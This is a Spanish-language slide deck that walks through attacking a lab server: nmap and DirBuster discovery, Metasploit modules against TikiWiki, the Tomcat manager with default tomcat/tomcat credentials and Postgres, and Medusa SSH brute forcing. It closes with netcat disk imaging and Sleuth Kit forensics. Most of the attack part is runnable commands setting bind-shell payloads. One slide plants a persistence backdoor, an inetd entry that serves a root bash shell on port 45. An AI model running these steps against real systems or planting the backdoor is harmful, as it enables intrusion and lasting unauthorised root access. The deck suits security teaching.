3. Seguridad Informatica
● No hay un sistema 100% seguro.
● A parte de que es una ilusión hoy veremos que
tan complicado puede ser tomar el control de
un servidor.
5. NMAP
● #descubriendo nodos en la red
● nmap –sP 192.168.1.0/24
● #descubriendo servicios en el server
● nmap –sV 192.168.1.X (versiones de
programas)
● -O
6. Mmm interesante tiene un servidor
web, que vive ahí???
● Descubrimiento de directorios en el servidor
web
● # cd /pentest/web/dirbuster/
● # java –jar DirBuster-0.12.jar
● escribimos el target, seleccionamos un archivo
de directorio y listo le ponemos start
7. Un servicio de portal, veamos que
podemos hacer...
●
# cd /pentest/exploits/framework3/
●
msf> search tikiwiki
●
msf> use auxiliary/admin/tikiwiki/tikidblib
●
msf auxiliary(tikidblib) > show options
●
● msf auxiliary(tikidblib) > set RHOST 192.168.1.X
● > exploit
● msf> use exploits/unix/webapp/tikiwiki_graph_formula_exec
● msf> show options
●
> set RHOST 192.168.229.129
● > show payloads
● > set PAYLOAD generic/shell_bind_tcp
8. Bien ahora es el turno de tomcat
● http://ip:8180
●
● msf> search tomcat
●
● msf> use auxiliary/scanner/http/tomcat_mrg_login
●
● set RHOSTS 192.168.229.129
●
● set RPORT 8180
●
9. Y eso para que me sirve tomcat 2
● #como ya podemos accesar al manager corremos otro
exploit
● msf > use exploits/multi/http/tomcat_mgr_deploy
● set USERNAME tomcat
● set PASSWORD tomcat
● set RPORT 8180
● set RHOST 192.168.229.129
● set PAYLOAD linux/x86/shell_bind_tcp
● exploit
10. Y postgres tendrá algo que decir??
● search postgres
● msf > use auxiliary/scanner/postgres/postgres_login
● set RHOSTS IP
● run
● # bien funciona ahora usemos un exploit que nos permite crear una tabla para poder
leer archivos del server.
● msf > use auxiliary/admin/postgres/postgres_readfile
● show options
● set RHOSTS ip
● set PASSWORD pass
● set archivo a leer
● run
11. Y el SSH apa
● #Medusa VNC, http, SMB, Telnet, FTP, SSH, etc.
● -h <HOST>: Dirección IP objetivo.
● -u < USUARIO>: Usuario objetivo. En este caso, msfadmin.
● -M <MODULO>: Módulo de ejecución en medusa. En este caso usaremos ssh.
● -e <n/s/ns>: Permite la comprobación de usuarios sin contraseña (n), Passwords
iguales que el nombre del usuario (s), o ambas (ns). Usaremos el valor ‘ns’.
● # medusa -h 192.168.1.74 -u msfadmin -M ssh -e ns
● # veamos si nuestro usuario puede hacerse root
● sudo -i
12. Te veo a la vuelta, pero seguro
regreso
● #nos aseguramos que en el archivo /etc/services tengamos el
servicio mpm con el puerto 45
● mpm 45/tcp
● #ahora agregamos una linea a la configuracion de xinetd en el
archivo /etc/inetd.conf
● mpm stream tcp root /bin/bash bash -i
● # y reiniciamos el servicio de xinetd, probamos con telnet y con
nmap
13. Aun me queda tiempo, bien veamos
un poco de analisis forense
● Ejecutemos netcat en el server en el que
haremos la investigacion para poder recibir la
copia del server
● nc -l 9000 > driveimage.dd
● Obtenemos una copia del SO.
● dd if=/dev/hda1 bs=2k | nc 192.168.1.X 9000
14. Sleuth kit
● Con estas herramientas podremos ver que
había en nuestro Disco.
● fls -f ext -m / -r driveimage.dd > datos-salida
● ils -f ext -m driveimage.dd >> datos-salida}
● mactime -b datos-salida yyyy-mm-dd..yyyy-
mm-dd > informe-actividad.yyyy
● icat -s -f ext driveimage.dd inodo